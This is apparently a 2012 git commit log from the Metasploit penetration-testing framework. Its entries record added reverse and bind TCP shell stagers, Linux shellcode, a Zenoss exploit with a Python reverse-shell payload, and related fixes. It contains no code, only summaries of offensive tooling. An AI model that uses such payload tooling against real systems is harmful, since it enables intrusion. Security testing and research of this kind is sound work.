dcbz 202a78dd3f Added say.rb: uses /usr/bin/say to output a string 2012-09-22 09:13:29 -05:00
dcbz 09b8a6d87f Added reverse_tcp stager payload, and updated bind 2012-09-22 08:31:42 -05:00
dcbz 81ceff7370 Added a tcp stager, and a small exec for testing 2012-09-22 07:24:51 -05:00
dcbz dccb8d235d Adding OSX 64-bit find-tag module. 2012-09-21 15:39:35 -05:00
sinn3r 776d24d8a9 cleanup 2012-09-20 16:16:30 -05:00
sinn3r 311c01be46 Cleanup, improve option handlingg 2012-09-20 16:14:15 -05:00
dcbz f5df7e0e8a Added 2 payload modules (reverse and bind tcp shells) 2012-09-19 16:59:26 -05:00
Ramon de C Valle 11f82de098 Update author information 2012-09-19 14:00:51 -03:00
James Lee 3c6319b75f Add nonx stagers for linux
[See #784]
2012-09-13 15:15:38 -05:00
James Lee f38ac954b8 Update linux stagers for NX compatibility
- Adds a call to mprotect(2) to the reverse and bind stagers

- Adds accurate source for some other linux shellcode, including some
  comments to make it more maintainable

- Adds tools/module_payload.rb for listing all payloads for each exploit
  in a greppable format. Makes it easy to find out if a payload change
  causes a payload to no longer be compatible with a given exploit.

- Missing from this commit is source for reverse_ipv6_tcp
2012-09-12 18:44:00 -05:00
HD Moore c901002e75 Add ssh login module for cydia / ios defaults 2012-09-10 19:36:20 -05:00
James Lee 828f37701d Fix linux shell_bind_tcp payload
It was calling bind(2) with a family of 0x02ff, which makes no sense and
causes execution to fall off the end and segfault.  Fix it by replacing
0x02ff with the appropriate 0x0002, or AF_INET.

[Fixrm #7216]
2012-09-04 04:23:48 -05:00
Tod Beardsley a93c7836bd Fixes load order with reverse http
This was originally intended to fix #664.

SEERM #7141 also.
2012-08-23 12:16:47 -05:00
James Lee aac56fc29b Fix load order issue
[See #664][SeeRM #7141]
2012-08-23 10:54:23 -05:00
sinn3r b3791b1545 I missed one 2012-08-14 16:51:55 -05:00
sinn3r 6a0271fb11 Correct OSX naming. See ticket #7182 2012-08-14 15:29:21 -05:00
sinn3r b46fb260a6 Comply with msftidy
*Knock, knock!*  Who's there? Me, the msftidy nazi!
2012-08-07 15:59:01 -05:00
bcoles 8d3700cc3c Add Zenoss <= 3.2.1 exploit and Python payload
- modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
 - modules/payloads/singles/cmd/unix/reverse_python.rb
2012-07-30 01:24:27 +09:30
HD Moore 6cdd044e10 Remove a buggy payload that doesn't have NX support 2012-07-12 12:15:57 -05:00
jvazquez-r7 59bb9ac23b quoting ip to avoid php complaining 2012-06-25 18:52:26 +02:00
Michael Schierl 34ecc7fd18 Adding @schierlm 's AES encryption for Java
Tested with and without AES, works as advertised. Set an AESPassword,
get encryptification. Score.

Squashed commit of the following:

commit cca6c5c36ca51d585b8d2fd0840ba34776bc0668
Author: Michael Schierl <schierlm@gmx.de>
Date:   Wed Apr 4 00:45:24 2012 +0200

    Do not break other architectures
    even when using `setg AESPassword`

commit 422d1e341b3865b02591d4c135427903c8da8ac5
Author: Michael Schierl <schierlm@gmx.de>
Date:   Tue Apr 3 21:50:42 2012 +0200

    binaries

commit 27368b5675222cc1730ac22e4b7a387b88d0d2b3
Author: Michael Schierl <schierlm@gmx.de>
Date:   Tue Apr 3 21:49:10 2012 +0200

    Add AES support to Java stager

    This is compatible to the AES mode of the JavaPayload project.

    I'm pretty sure the way I did it in the handlers (Rex::Socket::tcp_socket_pair())
    is not the supposed way, but it works :-)
2012-06-11 16:13:25 -05:00
HD Moore 881ec8d920 Make the description clear that it only reads 4k, default datastore['FD'] to 1 2012-06-10 13:20:02 -05:00
sinn3r 15fa178a66 Add the MSF license text (since MSF_LICENSE is already set) 2012-06-10 02:07:27 -05:00
linuxgeek247 2b67c5132c Adding read_file linux shellcode 2012-06-09 20:36:47 -04:00
sinn3r 462a91b005 Massive whitespace destruction
Remove tabs at the end of the line
2012-06-06 00:44:38 -05:00
sinn3r 3f0431cf51 Massive whitespace destruction
Remove whitespace found at the end of the line
2012-06-06 00:36:17 -05:00
sinn3r c30af98b53 Massive whitespace destruction
Remove all the lines that have nothing but whitespace
2012-06-06 00:22:36 -05:00
sinn3r 2565888ec5 Change how we handle the password complexity failure 2012-06-03 13:13:44 -05:00
Chris John Riley a51df5fc3a Altered description to include information on the password complexity check
Altered the default password to meet the complexity checks

Note: The complexity checks (even if they fail) don't prevent the payload from running. At this point it only raises an warning and continues on. I can change this if it's more desirable however!
2012-06-03 09:22:48 +02:00
Chris John Riley ea66deb779 Added WMIC and complexity checks 2012-06-02 19:41:12 +02:00
Chris John Riley bada88cdf0 Added WMIC and complexity checks 2012-06-02 19:38:37 +02:00
Tod Beardsley 86500aad47 Author is always singular. 2012-05-08 08:47:52 -05:00
HD Moore 1a30e221a0 See #362 by changing the exitfunc arguments to be the correct type 2012-05-07 02:42:29 -05:00